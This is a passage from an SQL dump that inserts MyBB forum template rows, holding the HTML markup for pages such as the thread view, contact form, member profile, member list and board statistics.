/>\n{$reputation}\n<strong>{$lang->email}</strong> {$mybb->user[\'email\']}<br />\n<strong>{$lang->registration_date}</strong> {$regdate}<br />\n<strong>{$lang->primary_usergroup}</strong> {$usergroup}<br />\n{$referral_info}\n</td>\n</tr>\n</table>\n{$latest_subscribed}\n{$latest_threads}\n{$latest_warnings}\n{$user_notepad}\n</td>\n</tr>\n</table>\n{$footer}\n</body>\n</html>', '1', '1608', '', '1339745373'); INSERT INTO mybb_templates VALUES('1860', 'forumdisplay_subforums', '<table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\">\n<tr>\n<td class=\"thead\" colspan=\"6\" align=\"center\"><strong>{$lang->sub_forums_in}</strong></td>\n</tr>\n<tr>\n<td class=\"tcat\" width=\"2%\">&nbsp;</td><td class=\"tcat\" width=\"2%\">&nbsp;</td>\n<td class=\"tcat\" width=\"59%\"><span class=\"smalltext\"><strong>{$lang->forumbit_forum}</strong></span></td>\n<td class=\"tcat\" width=\"7%\" align=\"center\" style=\"white-space: nowrap\"><span class=\"smalltext\"><strong>{$lang->forumbit_threads}</strong></span></td>\n<td class=\"tcat\" width=\"7%\" align=\"center\" style=\"white-space: nowrap\"><span class=\"smalltext\"><strong>{$lang->forumbit_posts}</strong></span></td>\n<td class=\"tcat\" width=\"15%\" align=\"center\"><span class=\"smalltext\"><strong>{$lang->forumbit_lastpost}</strong></span></td>\n</tr>\n{$forums}\n</table>\n<br />', '1', '1608', '', '1339745353'); INSERT INTO mybb_templates VALUES('1859', 'forumbit_depth2_forum', '<tr>\n<td class=\"{$bgcolor}\" align=\"center\" valign=\"top\" width=\"1\"><img src=\"{$theme[\'imgdir\']}/{$lightbulb[\'folder\']}.gif\" alt=\"{$lightbulb[\'altonoff\']}\" title=\"{$lightbulb[\'altonoff\']}\" class=\"ajax_mark_read\" id=\"mark_read_{$forum[\'fid\']}\" /></td><td class=\"{$bgcolor}\" align=\"center\" valign=\"top\" width=\"1\"><img src=\"uploads/ficons/{$forum[\'ficon\']}\" alt=\"{$forum[\'name\']}\" /></td>\n<td class=\"{$bgcolor}\" valign=\"top\">\n<strong><a href=\"{$forum_url}\">{$forum[\'name\']}</a></strong>{$forum_viewers_text}<div class=\"smalltext\">{$forum[\'description\']}{$modlist}{$subforums}</div>\n</td>\n<td class=\"{$bgcolor}\" valign=\"top\" align=\"center\" style=\"white-space: nowrap\">{$threads}{$unapproved[\'unapproved_threads\']}</td>\n<td class=\"{$bgcolor}\" valign=\"top\" align=\"center\" style=\"white-space: nowrap\">{$posts}{$unapproved[\'unapproved_posts\']}</td>\n<td class=\"{$bgcolor}\" valign=\"top\" align=\"right\" style=\"white-space: nowrap\">{$lastpost}</td>\n</tr>', '1', '1608', '', '1339745353'); INSERT INTO mybb_templates VALUES('1858', 'contact', '<html>\r\n<head>\r\n<title>{$mybb->settings[bbname]} - {$lang->title}</title>\r\n{$headerinclude}\r\n</head>\r\n<body>\r\n{$header}\r\n{$show_errors}\r\n<table border=\"0\" cellspacing=\"{$theme[borderwidth]}\" cellpadding=\"{$theme[tablespace]}\" class=\"tborder\">\r\n<tr>\r\n<td class=\"thead\"><strong>{$title}</strong></td>\r\n</tr>\r\n<tr>\r\n<td class=\"trow1\" align=\"center\">\r\n<form action=\"contact.php\" method=\"post\" name=\"contact\" id=\"contact\">\r\n<table border=\"0\" cellspacing=\"1\" width=\"75%\" cellpadding=\"4\">\r\n<tr align=\"left\">\r\n<td>\r\n<fieldset class=\"trow2\">\r\n<legend><strong>{$lang->details}</strong></legend>\r\n<label for=\"name\">{$lang->name}</label><br />\r\n<input class=\"text\" name=\"name\" type=\"text\" id=\"name\" value=\"{$mybb->user[username]}\" size=\"40\" /><br /><label for=\"emailaddress\">{$lang->email}</label><br />\r\n<input class=\"text\" name=\"email\" type=\"text\" id=\"emailaddress\" value=\"{$mybb->user[email]}\" size=\"40\" /></fieldset>\r\n</td>\r\n</tr>\r\n<tr align=\"left\">\r\n<td><fieldset class=\"trow2\">\r\n<legend><strong>{$lang->subject}</strong></legend>\r\n<select name=\"subject\">\r\n{$subjects}\r\n</select>\r\n<br />\r\n</fieldset>\r\n</td>\r\n </tr>\r\n<tr align=\"left\">\r\n<td>\r\n<fieldset class=\"trow2\">\r\n<legend><strong>{$lang->message}</strong></legend>\r\n<textarea name=\"message\" cols=\"60\" rows=\"12\" id=\"message\">{$message}</textarea>\r\n</fieldset>\r\n{$regimage}\r\n</td>\r\n</tr>\r\n</table>\r\n<input class=\"button\" name=\"send\" type=\"submit\" id=\"send\" value=\"Send\" />\r\n<input name=\"whosend\" type=\"hidden\" value=\"{$whosend}\" />\r\n<input type=\"hidden\" name=\"my_post_key\" value=\"{$mybb->post_code}\" />\r\n<input name=\"action\" type=\"hidden\" value=\"do_send_contact\" />\r\n</form>\r\n</td>\r\n</tr>\r\n</table>\r\n{$footer}\r\n</body>\r\n</html>', '-1', '1.0', '', '1148741710'); INSERT INTO mybb_templates VALUES('1856', 'showthread', '<html>\n<head>\n<title>{$thread[\'subject\']}</title>\n{$headerinclude}\n<script type=\"text/javascript\">\n<!--\n var quickdelete_confirm = \"{$lang->quickdelete_confirm}\";\n// -->\n</script>\n<script type=\"text/javascript\" src=\"jscripts/thread.js?ver=1603\"></script>\n</head>\n<body>\n {$header}\n {$pollbox}\n <div class=\"float_left\">\n {$multipage}\n\n </div>\n <div class=\"float_right\">\n {$selfclose}{$newreply}\n </div>\n {$ratethread}\n <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\" style=\"clear: both; border-bottom-width: 0;\">\n <tr>\n <td class=\"thead\" colspan=\"2\">\n <div style=\"float: right;\">\n <span class=\"smalltext\"><strong><a href=\"showthread.php?mode=threaded&amp;tid={$tid}&amp;pid={$pid}#pid{$pid}\">{$lang->threaded}</a> | <a href=\"showthread.php?mode=linear&amp;tid={$tid}&amp;pid={$pid}#pid{$pid}\">{$lang->linear}</a></strong></span>\n </div>\n <div>\n <strong>{$thread[\'threadprefix\']}{$thread[\'subject\']}</strong>\n </div>\n </td>\n </tr>\n {$classic_header}\n </table>\n <div id=\"posts\">\n {$posts}\n </div>\n <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\" style=\"border-top-width: 0;\">\n <tr>\n <td colspan=\"2\" class=\"tfoot\">\n {$search_thread}\n <div>\n <strong>&laquo; <a href=\"{$next_oldest_link}\">{$lang->next_oldest}</a> | <a href=\"{$next_newest_link}\">{$lang->next_newest}</a> &raquo;</strong>\n </div>\n </td>\n </tr>\n </table>\n <div class=\"float_left\">\n {$multipage}\n </div>\n <div style=\"padding-top: 4px;\" class=\"float_right\">\n {$selfclose}{$newreply}\n </div>\n <br style=\"clear: both;\" />\n {$quickreply}\n {$threadexbox}\n {$similarthreads}\n <br />\n <div class=\"float_left\">\n <ul class=\"thread_tools\">\n <li class=\"printable\"><a href=\"printthread.php?tid={$tid}\">{$lang->view_printable}</a></li>\n <li class=\"sendthread\"><a href=\"sendthread.php?tid={$tid}\">{$lang->send_thread}</a></li>\n <li class=\"subscription_{$add_remove_subscription}\"><a href=\"usercp2.php?action={$add_remove_subscription}subscription&amp;tid={$tid}&amp;my_post_key={$mybb->post_code}\">{$add_remove_subscription_text}</a></li>\n </ul>\n </div>\n\n <div class=\"float_right\" style=\"text-align: right;\">\n {$moderationoptions}\n {$forumjump}\n </div>\n <br style=\"clear: both;\" />\n {$usersbrowsing}\n {$footer}\n</body>\n</html>', '1', '1608', '', '1339745345'); INSERT INTO mybb_templates VALUES('1854', 'self_close_button', '\r\n<div style=\"float:left;\">\r\n <form action=\"moderation.php\" method=\"post\">\r\n <input type=\"hidden\" name=\"tid\" value=\"{$thread[\'tid\']}\" />\r\n <input type=\"hidden\" name=\"action\" value=\"selfclose\" />\r\n <input type=\"hidden\" name=\"my_post_key\" value=\"{$mybb->post_code}\" />\r\n <input type=\"image\" src=\"{$theme[\'imgdir\']}/{$lang->language}/postbit_close.gif\" alt=\"{$lang->close}\" title=\"{$lang->close_thread}\" name=\"submit\" />\r\n </form>\r\n</div>&nbsp;', '-1', '1', '', '1339745345'); INSERT INTO mybb_templates VALUES('1855', 'self_open_button', '\r\n<div style=\"float:left;\">\r\n <form action=\"moderation.php\" method=\"post\">\r\n <input type=\"hidden\" name=\"tid\" value=\"{$thread[\'tid\']}\" />\r\n <input type=\"hidden\" name=\"action\" value=\"selfopen\" />\r\n <input type=\"hidden\" name=\"my_post_key\" value=\"{$mybb->post_code}\" />\r\n <input type=\"image\" src=\"{$theme[\'imgdir\']}/{$lang->language}/postbit_open.gif\" alt=\"{$lang->open}\" title=\"{$lang->open_thread}\" name=\"submit\" />\r\n </form>\r\n</div>&nbsp;', '-1', '1', '', '1339745345'); INSERT INTO mybb_templates VALUES('1852', 'headerinclude', '{$metadescription}\r\n{$metakeywords}\r\n<link rel=\"alternate\" type=\"application/rss+xml\" title=\"{$lang->latest_threads} (RSS 2.0)\" href=\"{$mybb->settings[\'bburl\']}/syndication.php\" />\n<link rel=\"alternate\" type=\"application/atom+xml\" title=\"{$lang->latest_threads} (Atom 1.0)\" href=\"{$mybb->settings[\'bburl\']}/syndication.php?type=atom1.0\" />\n<meta http-equiv=\"Content-Type\" content=\"text/html; charset={$charset}\" />\n<meta http-equiv=\"Content-Script-Type\" content=\"text/javascript\" />\n<script type=\"text/javascript\" src=\"{$mybb->settings[\'bburl\']}/jscripts/prototype.js?ver=1603\"></script>\n<script type=\"text/javascript\" src=\"{$mybb->settings[\'bburl\']}/jscripts/general.js?ver=1603\"></script>\n<script type=\"text/javascript\" src=\"{$mybb->settings[\'bburl\']}/jscripts/popup_menu.js?ver=1600\"></script>\n{$stylesheets}\n<script type=\"text/javascript\">\n<!--\n var cookieDomain = \"{$mybb->settings[\'cookiedomain\']}\";\n var cookiePath = \"{$mybb->settings[\'cookiepath\']}\";\n var cookiePrefix = \"{$mybb->settings[\'cookieprefix\']}\";\n var deleteevent_confirm = \"{$lang->deleteevent_confirm}\";\n var removeattach_confirm = \"{$lang->removeattach_confirm}\";\n var loading_text = \'{$lang->ajax_loading}\';\n var saving_changes = \'{$lang->saving_changes}\';\n var use_xmlhttprequest = \"{$mybb->settings[\'use_xmlhttprequest\']}\";\n var my_post_key = \"{$mybb->post_code}\";\n var imagepath = \"{$theme[\'imgdir\']}\";\n// -->\n</script>\n{$newpmmsg}\r\n<script type=\"text/javascript\" src=\"{$mybb->settings[\'bburl\']}/jscripts/tabcontent.js\">\r\n/***********************************************\r\n* Tab Content script v2.2- copyright Dynamic Drive DHTML code library (www.dynamicdrive.com)\r\n* This notice MUST stay intact for legal use\r\n* Visit Dynamic Drive at http://www.dynamicdrive.com/ for full source code\r\n***********************************************/\r\n</script>\r\n', '1', '1608', '', '1339745341'); INSERT INTO mybb_templates VALUES('1850', 'index', '<html>\n<head>\n<title>{$mybb->settings[\'bbname\']}</title>\n{$headerinclude}\n<script type=\"text/javascript\">\n<!--\n lang.no_new_posts = \"{$lang->no_new_posts}\";\n lang.click_mark_read = \"{$lang->click_mark_read}\";\n// -->\n</script>\n</head>\n<body>\n{$header}{$tabmenu}\n{$forums}\r\n<script type=\"text/javascript\">\r\n<!--//\r\nvar myflowers=new ddtabcontent(\"menutabs\")\r\nmyflowers.setpersist(true)\r\nmyflowers.init()\r\n-->\r\n</script>\r\n\r\n\r\n\n{$boardstats}\n\n<dl class=\"forum_legend smalltext\">\n <dt><img src=\"{$theme[\'imgdir\']}/on.gif\" alt=\"{$lang->new_posts}\" title=\"{$lang->new_posts}\" style=\"vertical-align: middle; padding-bottom: 4px;\" /></dt>\n <dd>{$lang->new_posts}</dd>\n\n <dt><img src=\"{$theme[\'imgdir\']}/off.gif\" alt=\"{$lang->no_new_posts}\" title=\"{$lang->no_new_posts}\" style=\"vertical-align: middle; padding-bottom: 4px;\" /></dt>\n <dd>{$lang->no_new_posts}</dd>\n\n <dt><img src=\"{$theme[\'imgdir\']}/offlock.gif\" alt=\"{$lang->forum_locked}\" title=\"{$lang->forum_locked}\" style=\"vertical-align: middle;\" /></dt>\n <dd>{$lang->forum_locked}</dd>\n</dl>\n<br style=\"clear: both\" />\n{$footer}\n</body>\n</html>', '1', '1608', '', '1339745341'); INSERT INTO mybb_templates VALUES('1880', 'stats', '<html>\n<head>\n<title>{$mybb->settings[\'bbname\']} - {$lang->board_stats}</title>\n{$headerinclude}\n</head>\n<body>\n{$header}\n<table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\">\n<tr>\n<td class=\"thead\" colspan=\"2\"><strong>{$lang->board_stats}</strong></td>\n</tr>\n<tr>\n<td class=\"tcat\" width=\"50%\"><strong>{$lang->totals}</strong></td>\n<td class=\"tcat\" width=\"50%\"><strong>{$lang->averages}</strong></td>\n</tr>\n<tr>\n<td class=\"trow1\" valign=\"top\">\n{$lang->posts} <strong>{$stats[\'numposts\']}</strong><br />\n{$lang->threads} <strong>{$stats[\'numthreads\']}</strong><br />\n{$lang->members} <strong>{$stats[\'numusers\']}</strong>\n</td>\n<td class=\"trow1\" rowspan=\"3\" valign=\"top\">\n{$lang->ppd} <strong>{$postsperday}</strong><br />\n{$lang->tpd} <strong>{$threadsperday}</strong><br />\n{$lang->mpd} <strong>{$membersperday}</strong><br />\n{$lang->ppm} <strong>{$postspermember}</strong><br />\n{$lang->rpt} <strong>{$repliesperthread}</strong>\n</td>\n</tr>\n<tr>\n<td class=\"tcat\" valign=\"top\"><strong>{$lang->general}</strong></td>\n</tr>\n<tr>\n<td class=\"trow1\">\n{$lang->newest_member} {$stats[\'newest_user\']}<br />\n{$lang->members_posted} <strong>{$havepostedpercent}</strong><br />\n{$lang->todays_top_poster}<br />\n{$lang->popular_forum}\n</td>\n</tr>\n</table>\n\n\n<br />\n<table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\">\n<tr>\n<td class=\"thead\" colspan=\"2\"><strong>{$lang->most_popular}</strong></td>\n</tr>\n<tr>\n<td class=\"tcat\" width=\"50%\"><strong>{$lang->most_replied_threads}</strong></td>\n<td class=\"tcat\" width=\"50%\"><strong>{$lang->most_viewed_threads}</strong></td>\n</tr>\n<tr>\n<td class=\"trow1\" valign=\"top\">{$mostreplies}</td>\n<td class=\"trow1\" valign=\"top\">{$mostviews}</td>\n</tr>\n</table>\n{$footer}\n</body>\n</html>', '1', '1608', '', '1339745376'); INSERT INTO mybb_templates VALUES('2054', 'username_history', '<html>\r\n<head>\r\n<title>{$mybb->settings[\'bbname\']} - Keeps a record of username changes.</title>\r\n{$headerinclude}\r\n</head>\r\n<body>\r\n{$header}\r\n<table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\">\r\n<tr>\r\n<td class=\"thead\" colspan=\"2\"><strong>History of username changes for {$userlink}</strong></td>\r\n</tr>\r\n<tr>\r\n<td class=\"tcat\"><strong>{$lang->username}</strong></td>\r\n<td class=\"tcat\" align=\"center\"><strong>Date</strong></td>\r\n</tr>\r\n{$username_history_row}\r\n</table>\r\n{$footer}\r\n</body>\r\n</html>', '-1', '1', '', '1350614494'); INSERT INTO mybb_templates VALUES('1847', 'member_profile', '<html>\n<head>\n<title>{$mybb->settings[\'bbname\']} - {$lang->profile}</title>\n{$headerinclude}\n</head>\n<body>\n{$header}\n<table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\">\n<tr>\n<td class=\"trow1\">\n<table width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\"><tr><td class=\"trow1\" width=\"75%\">\n<span class=\"largetext\"><strong>{$formattedname}</strong></span><br />\n<span class=\"smalltext\">\n({$usertitle})<br />\n{$groupimage}\n{$userstars}<br />\n<br />\n<strong>{$lang->registration_date}</strong> {$memregdate}<br />\n<strong>{$lang->date_of_birth}</strong> {$membday} {$membdayage}<br />\n<strong>{$lang->local_time}</strong> {$localtime}<br />\n<strong>{$lang->postbit_status}</strong> {$online_status}\n</span>\n</td><td width=\"25%\" align=\"right\" valign=\"middle\">{$avatar}</td></tr></table>\n</td>\n</tr>\n{$awaybit}\n</table>\n<br />\n<table width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\" align=\"center\">\n<tr>\n<td width=\"50%\" valign=\"top\">\n<table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\">\n<tr>\n<td colspan=\"2\" class=\"thead\"><strong>{$lang->users_forum_info}</strong></td>\n</tr>\n<tr>\n<td class=\"trow1\"><strong>{$lang->joined}</strong></td>\n<td class=\"trow1\">{$memregdate}</td>\n</tr>\n<tr>\n<td class=\"trow2\"><strong>{$lang->lastvisit}</strong></td>\n<td class=\"trow2\">{$memlastvisitdate} {$memlastvisittime}</td>\n</tr>\n<tr>\n<td class=\"trow1\"><strong>{$lang->total_posts}</strong></td>\n<td class=\"trow1\">{$memprofile[\'postnum\']} ({$lang->ppd_percent_total})<br /><span class=\"smalltext\">(<a href=\"search.php?action=finduserthreads&amp;uid={$uid}\">{$lang->find_threads}</a> &mdash; <a href=\"search.php?action=finduser&amp;uid={$uid}\">{$lang->find_posts}</a>)</span></td>\n</tr>\n<tr>\n<td class=\"trow2\"><strong>{$lang->timeonline}</strong></td>\n<td class=\"trow2\">{$timeonline}</td>\n</tr>\n{$referrals}\n{$reputation}\n{$easyrefer}\n\n{$repoco}\n\n{$warning_level}\n</table>\n<br />\n<table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\">\n<tr>\n<td colspan=\"2\" class=\"thead\"><strong>{$lang->users_contact_details}</strong></td>\n</tr>\n<tr>\n<td class=\"trow1\" width=\"40%\"><strong>{$lang->homepage}</strong></td>\n<td class=\"trow1\">{$website}</td>\n</tr>\n{$sendemail}\n<tr>\n<td class=\"{$bgcolors[\'pm\']}\" style=\"vertical-align: top;\"><strong>{$lang->pm}</strong></td>\n<td class=\"{$bgcolors[\'pm\']}\"><a href=\"private.php?action=send&amp;uid={$memprofile[\'uid\']}\">{$lang->send_pm}</a>\n{$privatewarning}</td>\n</tr>\n<tr>\n<td class=\"{$bgcolors[\'icq\']}\"><strong>{$lang->icq_number}</strong></td>\n<td class=\"{$bgcolors[\'icq\']}\">{$memprofile[\'icq\']}</td>\n</tr>\n<tr>\n<td class=\"{$bgcolors[\'aim\']}\"><strong>{$lang->aim_screenname}</strong></td>\n<td class=\"{$bgcolors[\'aim\']}\"><a href=\"javascript:;\" onclick=\"MyBB.popupWindow(\'misc.php?action=imcenter&amp;imtype=aim&amp;uid={$uid}\', \'imcenter\', 450, 300);\">{$memprofile[\'aim\']}</a></td>\n</tr>\n<tr>\n<td class=\"{$bgcolors[\'yahoo\']}\"><strong>{$lang->yahoo_id}</strong></td>\n<td class=\"{$bgcolors[\'yahoo\']}\"><a href=\"javascript:;\" onclick=\"MyBB.popupWindow(\'misc.php?action=imcenter&amp;imtype=yahoo&amp;uid={$uid}\', \'imcenter\', 450, 300);\">{$memprofile[\'yahoo\']}</a></td>\n</tr>\n<tr>\n<td class=\"{$bgcolors[\'msn\']}\"><strong>{$lang->msn}</strong></td>\n<td class=\"{$bgcolors[\'msn\']}\"><a href=\"javascript:;\" onclick=\"MyBB.popupWindow(\'misc.php?action=imcenter&amp;imtype=msn&amp;uid={$uid}\', \'imcenter\', 450, 300);\">{$memprofile[\'msn\']}</a></td>\n</tr>\n</table>\n</td>\n<td><img src=\"{$theme[\'imgdir\']}/pixel.gif\" height=\"1\" width=\"8\" alt=\"\"/></td>\n<td width=\"50%\" valign=\"top\">\n{$profilefields}<!-- Profile_achivements -->{$achivementsprofile}<!-- /Profile_achivements -->\n{$signature}\n{$modoptions}\n{$adminoptions}\n{$buddy_options}\n</td>\n</tr>\n</table>\n{$footer}\n</body>\n</html>', '1', '1608', '', '1339745338'); INSERT INTO mybb_templates VALUES('1849', 'forumbit_depth1_cat', ' <div id=\"tabmenu_{$forum[\'fid\']}\"> <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\">\n<thead>\n<tr>\n<td class=\"thead\" colspan=\"6\">\n<div class=\"expcolimage\"><img src=\"{$theme[\'imgdir\']}/{$expcolimage}\" id=\"cat_{$forum[\'fid\']}_img\" class=\"expander\" alt=\"{$expaltext}\" title=\"{$expaltext}\" /></div>\n<div><strong><a href=\"{$forum_url}\">{$forum[\'name\']}</a></strong><br /><div class=\"smalltext\">{$forum[\'description\']}</div></div>\n</td>\n</tr>\n</thead>\n<tbody style=\"{$expdisplay}\" id=\"cat_{$forum[\'fid\']}_e\">\n<tr>\n<td class=\"tcat\" colspan=\"3\"><span class=\"smalltext\"><strong>{$lang->forumbit_forum}</strong></span></td>\n<td class=\"tcat\" width=\"85\" align=\"center\" style=\"white-space: nowrap\"><span class=\"smalltext\"><strong>{$lang->forumbit_threads}</strong></span></td>\n<td class=\"tcat\" width=\"85\" align=\"center\" style=\"white-space: nowrap\"><span class=\"smalltext\"><strong>{$lang->forumbit_posts}</strong></span></td>\n<td class=\"tcat\" width=\"200\" align=\"center\"><span class=\"smalltext\"><strong>{$lang->forumbit_lastpost}</strong></span></td>\n</tr>\n{$sub_forums}\n</tbody>\n</table>\n<br /></div>', '1', '1608', '', '1339745341'); INSERT INTO mybb_templates VALUES('1994', 'memberlist', '<html>\r\n<head>\r\n<title>{$mybb->settings[\'bbname\']} - {$lang->member_list}</title>\r\n{$headerinclude}\r\n</head>\r\n<body>\r\n{$header}\r\n<form method=\"post\" action=\"memberlist.php\">\r\n<table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\">\r\n<tr>\r\n<td class=\"thead\" colspan=\"3\">\r\n <div class=\"float_right\">\r\n <strong><a href=\"memberlist.php?action=search\">{$lang->advanced_search}</a></strong>\r\n </div>\r\n <div><strong>{$lang->search_members}</strong></div>\r\n</td>\r\n</tr>\r\n<tr>\r\n <td class=\"tcat\"><strong><label for=\"username\">{$lang->username}</label></strong></td>\r\n <td class=\"tcat\"><strong><label for=\"website\">{$lang->website}</label></strong></td>\r\n <td class=\"tcat\"><strong><label for=\"sort\">{$lang->sort_by}</label></strong></td>\r\n</tr>\r\n<tr>\r\n <td class=\"trow1\" width=\"33%\" style=\"vertical-align: top;\">\r\n {$lang->contains}<br />\r\n <input type=\"text\" class=\"textbox\" name=\"username\" id=\"username\" style=\"width: 95%; margin-top: 4px;\" value=\"{$search_username}\" />\r\n </td>\r\n <td class=\"trow1\" width=\"33%\" style=\"vertical-align: top;\">\r\n {$lang->contains}<br />\r\n <input type=\"text\" class=\"textbox\" name=\"website\" id=\"website\" style=\"width: 96%; margin-top: 4px;\" value=\"{$search_website}\" />\r\n </td>\r\n <td class=\"trow1\" width=\"33%\">\r\n <select name=\"sort\" id=\"sort\" style=\"width: 95%;\">\r\n <option value=\"username\"{$sort_selected[\'username\']}>{$lang->sort_by_username}</option>\r\n <option value=\"regdate\"{$sort_selected[\'regdate\']}>{$lang->sort_by_regdate}</option>\r\n <option value=\"reputation\"{$sort_selected[\'reputation\']}>{$lang->sort_by_reputation}</option>\r\n <option value=\"lastvisit\"{$sort_selected[\'lastvisit\']}>{$lang->sort_by_lastvisit}</option>\r\n <option value=\"postnum\"{$sort_selected[\'postnum\']}>{$lang->sort_by_posts}</option>\r\n <option value=\"referrals\"{$sort_selected[\'referrals\']}>{$lang->sort_by_referrals}</option>\r\n </select><br />\r\n <span class=\"smalltext\">\r\n <input type=\"radio\" class=\"radio\" name=\"order\" id=\"order_asc\" value=\"ascending\"{$order_check[\'ascending\']} /> <label for=\"order_asc\">{$lang->order_asc}</label><br />\r\n <input type=\"radio\" class=\"radio\" name=\"order\" id=\"order_desc\" value=\"descending\"{$order_check[\'descending\']} /> <label for=\"order_desc\">{$lang->order_desc}</label>\r\n </span>\r\n </td>\r\n</tr>\r\n</table>\r\n<div align=\"center\"><br /><input type=\"submit\" class=\"button\" name=\"submit\" value=\"{$lang->search}\" /></div>\r\n</form>\r\n{$multipage}\r\n<table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\">\r\n<tr>\r\n<td class=\"thead\" colspan=\"7\">\r\n <div class=\"float_right\">\r\n <a href=\"memberlist.php?username_match=begins&amp;username={$lang->a}\" style=\"padding: 5px;\">{$lang->a}</a>\r\n <a href=\"memberlist.php?username_match=begins&amp;username={$lang->b}\" style=\"padding: 5px;\">{$lang->b}</a>\r\n <a href=\"memberlist.php?username_match=begins&amp;username={$lang->c}\" style=\"padding: 5px;\">{$lang->c}</a>\r\n <a href=\"memberlist.php?username_match=begins&amp;username={$lang->d}\" style=\"padding: 5px;\">{$lang->d}</a>\r\n <a href=\"memberlist.php?username_match=begins&amp;username={$lang->e}\" style=\"padding: 5px;\">{$lang->e}</a>\r\n <a href=\"memberlist.php?username_match=begins&amp;username={$lang->f}\" style=\"padding: 5px;\">{$lang->f}</a>\r\n <a href=\"memberlist.php?username_match=begins&amp;username={$lang->g}\" style=\"padding: 5px;\">{$lang->g}</a>\r\n <a href=\"memberlist.php?username_match=begins&amp;username={$lang->h}\" style=\"padding: 5px;\">{$lang->h}</a>\r\n <a href=\"memberlist.php?username_match=begins&amp;username={$lang->i}\" style=\"padding: 5px;\">{$lang->i}</a>\r\n <a href=\"memberlist.php?username_match=begins&amp;username={$lang->j}\" style=\"padding: 5px;\">{$lang->j}</a>\r\n <a href=\"memberlist.php?username_match=begins&amp;username={$lang->k}\" style=\"padding: 5px;\">{$lang->k}</a>\r\n <a href=\"memberlist.php?username_match=begins&amp;username={$lang->l}\" style=\"padding: 5px;\">{$lang->l}</a>\r\n <a href=\"memberlist.php?username_match=begins&amp;username={$lang->m}\" style=\"padding: 5px;\">{$lang->m}</a>\r\n <a href=\"memberlist.php?username_match=begins&amp;username={$lang->n}\" style=\"padding: 5px;\">{$lang->n}</a>\r\n <a href=\"memberlist.php?username_match=begins&amp;username={$lang->o}\" style=\"padding: 5px;\">{$lang->o}</a>\r\n <a href=\"memberlist.php?username_match=begins&amp;username={$lang->p}\" style=\"padding: 5px;\">{$lang->p}</a>\r\n <a href=\"memberlist.php?username_match=begins&amp;username={$lang->q}\" style=\"padding: 5px;\">{$lang->q}</a>\r\n <a href=\"memberlist.php?username_match=begins&amp;username={$lang->r}\" style=\"padding: 5px;\">{$lang->r}</a>\r\n <a href=\"memberlist.php?username_match=begins&amp;username={$lang->s}\" style=\"padding: 5px;\">{$lang->s}</a>\r\n <a href=\"memberlist.php?username_match=begins&amp;username={$lang->t}\" style=\"padding: 5px;\">{$lang->t}</a>\r\n <a href=\"memberlist.php?username_match=begins&amp;username={$lang->u}\" style=\"padding: 5px;\">{$lang->u}</a>\r\n <a href=\"memberlist.php?username_match=begins&amp;username={$lang->v}\" style=\"padding: 5px;\">{$lang->v}</a>\r\n <a href=\"memberlist.php?username_match=begins&amp;username={$lang->w}\" style=\"padding: 5px;\">{$lang->w}</a>\r\n <a href=\"memberlist.php?username_match=begins&amp;username={$lang->x}\" style=\"padding: 5px;\">{$lang->x}</a>\r\n <a href=\"memberlist.php?username_match=begins&amp;username={$lang->y}\" style=\"padding: 5px;\">{$lang->y}</a>\r\n <a href=\"memberlist.php?username_match=begins&amp;username={$lang->z}\" style=\"padding: 5px;\">{$lang->z}</a>\r\n </div>\r\n <div><strong>{$lang->member_list}</strong></div></td>\r\n</tr>\r\n<tr>\r\n<td class=\"tcat\" width=\"1%\"><span class=\"smalltext\"><strong>{$lang->avatar}</strong></span></td>\r\n<td class=\"tcat\"><span class=\"smalltext\"><strong>{$lang->username}</strong></span></td>\r\n<td class=\"tcat\" width=\"15%\" align=\"center\"><span class=\"smalltext\"><strong>{$lang->joined}</strong></span></td>\r\n<td class=\"tcat\" width=\"15%\" align=\"center\"><span class=\"smalltext\"><strong>{$lang->lastvisit}</strong></span></td>\r\n<td class=\"tcat\" width=\"10%\" align=\"center\"><span class=\"smalltext\"><strong>{$lang->reputation}</strong></span></td>\r\n<td class=\"tcat\" width=\"10%\" align=\"center\"><span class=\"smalltext\"><strong>{$lang->posts}</strong></span></td>\r\n{$referral_header}\r\n</tr>\r\n{$users}\r\n</table>\r\n<div class=\"float_right\" style=\"padding-top: 4px;\">\r\n <a href=\"showteam.php\"><strong>{$lang->forumteam}</strong></a>\r\n</div>\r\n{$multipage}\r\n\r\n{$footer}\r\n<script type=\"text/javascript\" src=\"jscripts/autocomplete.js?ver=1400\"></script>\r\n<script type=\"text/javascript\">\r\n<!--\r\n if(use_xmlhttprequest == \"1\")\r\n {\r\n new autoComplete(\"username\", \"xmlhttp.php?action=get_users\", {valueSpan: \"username\"});\r\n }\r\n// -->\r\n</script>\r\n</body>\r\n</html>', '8', '1608', '', '1344964712'); INSERT INTO mybb_templates VALUES('1886', 'forumdisplay_thread', '<tr{$thread[\'hellban_css\']}>\n <td align=\"center\" class=\"{$bgcolor}{$thread_type_class}\" width=\"2%\"><img src=\"{$theme[\'imgdir\']}/{$folder}.gif\" alt=\"{$folder_label}\" title=\"{$folder_label}\" /></td>\n <td align=\"center\" class=\"{$bgcolor}{$thread_type_class}\" width=\"2%\">{$icon}</td>\n <td 